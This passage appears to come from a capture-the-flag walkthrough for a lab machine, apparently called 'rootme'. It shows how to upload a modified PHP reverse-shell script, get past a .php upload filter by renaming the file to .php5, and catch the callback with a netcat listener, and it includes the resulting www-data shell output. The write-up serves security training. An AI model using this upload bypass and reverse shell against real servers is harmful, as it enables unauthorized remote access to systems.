In order to get a reverse shell, we have to first go to the /panel directory.
There are multiple ways of obtaining a reverse shell. We will be using a php reverse shell.
We will be using the /usr/share/webshells/php/php-reverse-shell.php script after making some modifications.
We have to replace the IP address with our own IP address which we can find using the ip command. We can also change the port to any particular port we want like 9999.
$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 08:00:27:9f:ce:18 brd ff:ff:ff:ff:ff:ff
inet 10.0.4.6/24 brd 10.0.4.255 scope global dynamic noprefixroute eth0
valid_lft 332sec preferred_lft 332sec
inet6 fe80::a00:27ff:fe9f:ce18/64 scope link noprefixroute
valid_lft forever preferred_lft forever
5: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
link/none
inet 10.17.48.138/17 scope global tun0
valid_lft forever preferred_lft forever
inet6 fe80::691d:5bb7:720:68ac/64 scope link stable-privacy
valid_lft forever preferred_lft forever
Once we have replaced the IP address we are ready to upload our php-reverse-shell.php file.
Let's click on the Upload button next.
Looks like php is not allowed.
There is a workaround for this, we can try to change the file extension to php5 to see if that is allowed.
Let's hit Upload.
Our file upload has been successful.
We can now use netcat to listen for requests.
$ nc -nlvp 9999
Next, let's go to the /uploads folder.
On clicking on the php-reverse-shell.php5 link, a request will be sent to our IP address on the 9999 port which will be caught by our netcat listener.
$ nc -nlvp 9999
listening on [any] 9999 ...
connect to [10.17.48.138] from (UNKNOWN) [10.10.216.90] 44132
Linux rootme 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
14:26:08 up 54 min, 0 users, load average: 0.00, 0.00, 0.02
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
We have our reverse shell.
Let's find the user.txt file using the find command.